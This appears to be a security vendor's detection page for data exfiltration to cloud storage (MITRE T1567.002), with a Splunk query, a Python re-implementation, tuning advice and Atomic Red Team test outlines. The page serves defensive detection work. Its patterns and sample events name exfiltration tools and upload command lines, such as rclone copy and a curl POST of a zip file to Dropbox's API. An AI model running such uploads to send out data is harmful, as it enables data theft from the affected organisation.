Detect Exfiltration to Cloud Storage in Splunk
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.
MITRE ATT&CK
- Tactic: Exfiltration
- Technique: T1567 Exfiltration Over Web Service
- Sub-technique: T1567.002 Exfiltration to Cloud Storage
- Canonical reference: https://attack.mitre.org/techniques/T1567/002/
SPL Detection Query
index=wineventlog
(
(
sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(
Image="*\\rclone.exe" OR Image="*\\azcopy.exe" OR Image="*\\megatools.exe" OR Image="*\\megaput.exe"
OR
(
(Image="*\\curl.exe" OR Image="*\\wget.exe" OR Image="*\\python.exe" OR Image="*\\python3.exe" OR Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
(CommandLine="*dropbox.com*" OR CommandLine="*dropboxapi.com*" OR CommandLine="*googleapis.com*" OR CommandLine="*graph.microsoft.com*" OR CommandLine="*s3.amazonaws.com*" OR CommandLine="*mega.io*" OR CommandLine="*mega.nz*" OR CommandLine="*onedrive.live.com*" OR CommandLine="*api.box.com*")
(CommandLine="*-T *" OR CommandLine="*--upload-file*" OR CommandLine="*-X PUT*" OR CommandLine="*-X POST*" OR CommandLine="*--data-binary*" OR CommandLine="*upload*")
)
OR
(
(Image="*\\rclone.exe" OR Image="*\\azcopy.exe")
OR (CommandLine="*rclone copy*" OR CommandLine="*rclone sync*" OR CommandLine="*rclone move*" OR CommandLine="*azcopy copy*" OR CommandLine="*azcopy sync*" OR CommandLine="*gsutil cp*" OR CommandLine="*gsutil rsync*" OR CommandLine="*aws s3 cp*" OR CommandLine="*aws s3 sync*")
OR (CommandLine="*:dropbox*" OR CommandLine="*:gdrive*" OR CommandLine="*:onedrive*" OR CommandLine="*mega:*" OR CommandLine="*:s3*")
)
)
)
OR
(
sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
Initiated=true
(
DestinationHostname="*dropbox.com" OR DestinationHostname="*dropboxapi.com"
OR DestinationHostname="*googleapis.com" OR DestinationHostname="*drive.google.com"
OR DestinationHostname="*graph.microsoft.com" OR DestinationHostname="*onedrive.live.com"
OR DestinationHostname="*s3.amazonaws.com" OR DestinationHostname="*mega.io"
OR DestinationHostname="*api.box.com"
)
NOT (Image="*\\OneDrive.exe" OR Image="*\\googledrivesync.exe" OR Image="*\\Dropbox.exe" OR Image="*\\GoogleDriveFS.exe")
)
)
| eval SignalType=case(
EventCode=1 AND match(Image, "(rclone|azcopy|megaput|megatools)"), "CloudSyncTool",
EventCode=1 AND match(CommandLine, "(rclone copy|rclone sync|azcopy copy|gsutil cp|aws s3 cp)"), "CloudSyncCommand",
EventCode=1, "ApiUpload",
EventCode=3, "CloudStorageNetConn",
true(), "Unknown"
)
| eval IsKnownSyncClient=if(match(Image, "(OneDrive\.exe|googledrivesync\.exe|Dropbox\.exe|GoogleDriveFS\.exe|backup|veeam)"), 1, 0)
| where IsKnownSyncClient=0
| table _time, host, User, Image, CommandLine, DestinationHostname, DestinationPort, ParentImage, ParentCommandLine, SignalType
| sort - _time

Detects cloud storage exfiltration via two Sysmon signals: Event ID 1 (Process Create) for rclone, azcopy, and curl/scripting tools uploading to cloud storage APIs, and Event ID 3 (Network Connect) for outbound connections to cloud storage hostnames from non-standard sync client processes. Excludes known legitimate desktop sync clients (OneDrive.exe, Dropbox.exe, GoogleDriveFS.exe). The SignalType field helps analysts quickly categorize the detection vector for triage.
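To see how the query's three stages (the search filters, the SignalType eval, and the IsKnownSyncClient exclusion) behave on concrete events, the following is an added Python re-implementation of that logic run over constructed Sysmon-style events shaped like the expected signals of Tests 1-3 below; it is example code written for this page, not part of the detection package, and the like() helper, the sample events and their paths are assumptions. It surfaces two things worth knowing before deployment: the PowerShell Graph upload is returned only by the Event ID 3 branch, because its command line contains none of the upload-flag keywords, and any process that reaches a *.googleapis.com host (a browser, for instance) produces a CloudStorageNetConn row.

```python
import re

def like(patterns, value):
    # Splunk-style wildcard test on a field value: '*' matches any run of characters, case-insensitive.
    return any(re.fullmatch(".*".join(map(re.escape, p.split("*"))), value, re.I) for p in patterns)

# Search-stage patterns copied from the query's Event ID 1 and Event ID 3 branches.
SYNC_TOOLS = ["*\\rclone.exe", "*\\azcopy.exe", "*\\megatools.exe", "*\\megaput.exe"]
SCRIPT_TOOLS = ["*\\curl.exe", "*\\wget.exe", "*\\python.exe", "*\\python3.exe", "*\\powershell.exe", "*\\pwsh.exe"]
API_HOSTS = ["*dropbox.com*", "*dropboxapi.com*", "*googleapis.com*", "*graph.microsoft.com*", "*s3.amazonaws.com*",
             "*mega.io*", "*mega.nz*", "*onedrive.live.com*", "*api.box.com*"]
UPLOAD_FLAGS = ["*-T *", "*--upload-file*", "*-X PUT*", "*-X POST*", "*--data-binary*", "*upload*"]
SYNC_CMDS = ["*rclone copy*", "*rclone sync*", "*rclone move*", "*azcopy copy*", "*azcopy sync*", "*gsutil cp*",
             "*gsutil rsync*", "*aws s3 cp*", "*aws s3 sync*", "*:dropbox*", "*:gdrive*", "*:onedrive*", "*mega:*", "*:s3*"]
NET_HOSTS = ["*dropbox.com", "*dropboxapi.com", "*googleapis.com", "*drive.google.com", "*graph.microsoft.com",
             "*onedrive.live.com", "*s3.amazonaws.com", "*mega.io", "*api.box.com"]
NET_EXCLUDE = ["*\\OneDrive.exe", "*\\googledrivesync.exe", "*\\Dropbox.exe", "*\\GoogleDriveFS.exe"]
# eval-stage regex: Splunk match() is case-sensitive, unlike the search wildcards above.
KNOWN_SYNC = re.compile(r"(OneDrive\.exe|googledrivesync\.exe|Dropbox\.exe|GoogleDriveFS\.exe|backup|veeam)")
def classify(ev):
    # The query's SignalType for one Sysmon event, or None when the search/where stages would drop it.
    code, img, cmd = ev.get("EventCode"), ev.get("Image", ""), ev.get("CommandLine", "")
    if code == 1:
        hit = like(SYNC_TOOLS, img) or like(SYNC_CMDS, cmd) or (
            like(SCRIPT_TOOLS, img) and like(API_HOSTS, cmd) and like(UPLOAD_FLAGS, cmd))
    else:
        hit = (code == 3 and ev.get("Initiated") == "true"
               and like(NET_HOSTS, ev.get("DestinationHostname", "")) and not like(NET_EXCLUDE, img))
    if not hit or KNOWN_SYNC.search(img):  # `| where IsKnownSyncClient=0`
        return None
    if code == 1 and re.search(r"(rclone|azcopy|megaput|megatools)", img):
        return "CloudSyncTool"
    if code == 1 and re.search(r"(rclone copy|rclone sync|azcopy copy|gsutil cp|aws s3 cp)", cmd):
        return "CloudSyncCommand"
    return "ApiUpload" if code == 1 else "CloudStorageNetConn"
# Constructed sample events (not real telemetry) shaped like the expected signals of Tests 1-3, plus two
# benign connections that exercise the exclusion logic.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLES = [
    {"EventCode": 1, "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe copy C:\\Finance localtest:out"},
    {"EventCode": 1, "Image": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl -X POST https://content.dropboxapi.com/2/files/upload --data-binary @docs.zip"},
    {"EventCode": 1, "Image": PS, "CommandLine": "powershell Invoke-RestMethod -Method PUT -Uri https://graph.microsoft.com/v1.0/me/drive/root:/d.zip:/content"},
    {"EventCode": 3, "Image": PS, "Initiated": "true", "DestinationHostname": "graph.microsoft.com"},
    {"EventCode": 3, "Image": "C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe", "Initiated": "true", "DestinationHostname": "onedrive.live.com"},
    {"EventCode": 3, "Image": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "Initiated": "true", "DestinationHostname": "update.googleapis.com"},
]
def run(events=SAMPLES):
    # One (EventCode, image basename, SignalType or None) per event; None means the query would not alert.
    return [(e["EventCode"], e["Image"].rsplit("\\", 1)[-1], classify(e)) for e in events]
```

Feeding your own exported events into run() is a quick way to check an exclusion-list change before editing the saved search.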
False Positives & Tuning
- OneDrive, Google Drive, and Dropbox desktop sync clients — excluded by image name filter but verify the exclusion list matches your environment
- DevOps CI/CD agents running rclone or azcopy for legitimate artifact management
- IT-approved backup tools using cloud storage backends — add their process image names to the exclusion filter
- Developers using AWS CLI or gsutil from personal workstations for legitimate project work
- Security scanning or SIEM forwarder processes that check cloud storage endpoints for threat intelligence
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)
Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.
- Test 2: curl Upload to Cloud Storage API Endpoint
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.
- Test 3: PowerShell Upload to OneDrive Graph API
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.
- Test 4: Rclone Configuration File Drop and Cloud Remote Enumeration
Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.
References
- https://attack.mitre.org/techniques/T1567/002/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md
- https://rclone.org/docs/
- https://www.secureworks.com/research/gold-sahara
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
- https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/
- https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-LuminousMoth-creat5540-en-EN.pdf
- https://research.nccgroup.com/2021/06/15/responding-to-ransomware-rclone-and-the-many-flavors-of-data-exfiltration/
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
- https://learn.microsoft.com/en-us/azure/storage/common/storage-ref-azcopy
- https://unit42.paloaltonetworks.com/stately-taurus-targets-myanmar-government/
- https://www.cisa.gov/sites/default/files/publications/AA21-291A.pdf